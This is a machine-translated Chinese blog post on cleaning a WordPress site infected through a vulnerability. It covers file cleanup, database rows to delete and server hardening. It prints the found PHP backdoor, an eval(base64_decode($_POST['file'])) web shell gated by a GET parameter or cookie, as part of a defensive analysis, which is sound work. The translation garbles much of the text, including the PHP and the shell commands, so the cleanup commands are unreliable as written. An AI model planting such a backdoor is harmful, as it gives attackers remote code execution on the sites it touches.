WordPress的漏洞 - 清潔文件的病毒和安全的SQL服務器。

在你讀這篇文章之前,你應該看到 ,要了解的東西。 :)

我們發現有很多的博客對stealthsettings.com文件,類似於下面的代碼,而從virusarii WordPress的開發.:

<?腓如果($ _ GET ['573abcb060974771'] ==“8e96d1b4b674e1d2”){的eval(base64_decode($ _ POST ['文件'])); 退出; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPC如果上面的有關該文件的 xmlrpc.php,在A grep的 服務器,貌似這種相當多的源代碼。

pppffiuuu

清洗受感染的文件:

Ooookkkk ...
1。 最好的解決辦法,因為它是做 備用和清理數據庫是 消除WordPress (您可以在服務器上保留wp-config.php和經過仔細檢查後不嚴格在wp平台上的文件)並上傳到原始版本 2.5.1 (在此之際,進行版本升級WP :)) http://wordpress.org/download/ 。 擦拭包括主題文件,如果你不相信,他們仔細檢查。

它似乎已經受到影響,尚未使用之前在博客上,只是改變主題的主題文件,沒有解決不了的問題。

./andreea/wp-content/themes/default/index.php:<?php如果($ _ COOKIE ['44e827f9fbeca184'] =='5cd3c94b4b1c57ea“){的eval(base64_decode($ _ POST ['文件'])); 出口; ?}?> <PHP的get_header(); ?>

2。 搜索並刪除所有的文件,其中包含:* _new.php,* _old.php,*。Jpgg,*。吉夫,*。的Pngg和WP-info.txt文件,如果有的話。

查找。 名稱“* _new.php”
查找。 名稱“* _old.php”
查找。 名稱“*。Jpgg”
查找。 名稱“* _giff”
查找。 名稱“* _pngg”
查找。 名稱“WP-info.txt文件”

3。 在 / tmp目錄 ,搜索和刪除文件夾,如 tmpYwbzT2

SQL清洗 :

1。 在數據表 wp_options 檢查和刪除線: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2。 所有wp_options active_plugins 並刪除,如果有一個插件,在一個擴展名為* _new.php,* _old.php,*。jpgg,*。吉夫,*。pngg或懷疑另一分機,仔細檢查結束。

3。 在表 wp_users,如果有一個用戶誰沒有寫過東西,列在他的右 user_nicename。 刪除用戶,但要注意的ID列上的號碼。 用戶可以使用“WordPress的” 用user_login 創建和出現在00:00:00 0000 00 00。

4。 轉到表 wp_usermeta 並刪除所有線以上屬於ID。

當你做了這個SQL清洗,禁用然後啟用某個插件。 (博客 - >“面板 - >插件)

安全服務器:

1。 查看目錄和文件“可寫“(CHMOD 777),並試圖把他們 CHMOD 在任何級別的,不會讓自己的寫作。 (CHMOD 644,例如)

查找。 彼爾姆2 LS

2。 查看哪些文件有位集 SUIDSGID 。 如果你不使用這些文件對他們提出 CHMOD 0的 或卸載程序包,它包含。 他們是非常危險的,因為他們執行權限““或”“不具有普通用戶權限執行該文件。

/型F-燙髮04000 LS
/型F-燙髮02000 LS

3。 查看哪些端口是開放的,並嘗試關閉或擔保這些一點用都沒有。

NETSTAT-| grep的,我聽

這麼多。 我看到 谷歌搜索和其他人說,“嗯,他們做到了!”。 好吧好吧,你已經做了......但你知道,如果谷歌開始禁止 所有站點 成型 為垃圾郵件 並把木馬(Trojan.Clicker.HTML)在餅乾?

WordPress的漏洞 - 清潔文件的病毒和安全的SQL服務器。

關於作者

隱身

熱愛這些小工具,並將其寫入2006的欣然stealthsettings.com,我喜歡去發現與你有關計算機和MacOS,Linux和Windows中,iOS和Android的新的東西的一切。

添加評論

發表評論